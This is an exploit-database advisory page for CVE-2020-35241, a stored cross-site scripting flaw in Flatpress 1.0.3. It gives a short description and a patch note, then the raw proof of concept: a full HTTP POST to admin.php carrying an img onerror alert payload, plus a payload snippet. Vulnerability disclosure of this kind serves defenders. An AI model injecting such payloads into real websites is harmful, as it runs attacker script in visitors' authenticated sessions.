Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting

vendor:

Flatpress Add Blog

by:

Alperen Ergel

4.8

CVSS

MEDIUM

Persistent Cross-Site Scripting

CWE

Product Name: Flatpress Add Blog

Affected Version From: 1.0.3

Affected Version To: 1.0.3

Patch Exists: YES

Related CWE: CVE-2020-35241

CPE: a:flatpress:flatpress:1.0.3

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 / XAMPP

2020

Flatpress Add Blog 1.0.3 – Persistent Cross-Site Scripting

Flatpress Add Blog 1.0.3 is vulnerable to persistent cross-site scripting. An attacker can inject malicious JavaScript code into the content parameter of the POST request to the admin.php page. This code will be executed when the page is loaded by an authenticated user.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of the software.

Source

Exploit-DB raw data:

# Exploit Title: Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting
# Date: 2020-09-19
# Exploit Author: Alperen Ergel
# Vendor Homepage: https://www.flatpress.org/
# Software Link: https://github.com/evacchi/flatpress/releases/tag/v1.0.3
# Version: 1.0.3 
# Tested on: windows 10 / xampp 
# CVE : CVE-2020-35241


# Proof Of Content

POST /flatpress/admin.php?p=entry&action=write HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Origin: http://localhost/
Connection: close
Referer: http://localhost/flatpress/admin.php?p=entry&action=write
Cookie: fpuser_fp-a53f4609=opensourcecms; fppass_fp-a53f4609=79dc9a3c529fcd0d9dc4fc7ff22187b6; fpsess_fp-a53f4609=71v18tu3lsc0s021q2pj8a3je7; _ga=GA1.2.487908813.1600520069; _gid=GA1.2.951134816.1600520069; _gat=1
Upgrade-Insecure-Requests: 1

_wpnonce=4fc4222db1&_wp_http_referer=%2Fflatpress%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=XSS&timestamp=1600526382&
entry=entry200919-143942&attachselect=--&imageselect=--&content=<img src=x onerror='alert("TEST XSS")'/>&savecontinue=Save%26Continue


# Snipp

content=[PAYLOAD] //<img src=x onerror='alert("TEST XSS")'/>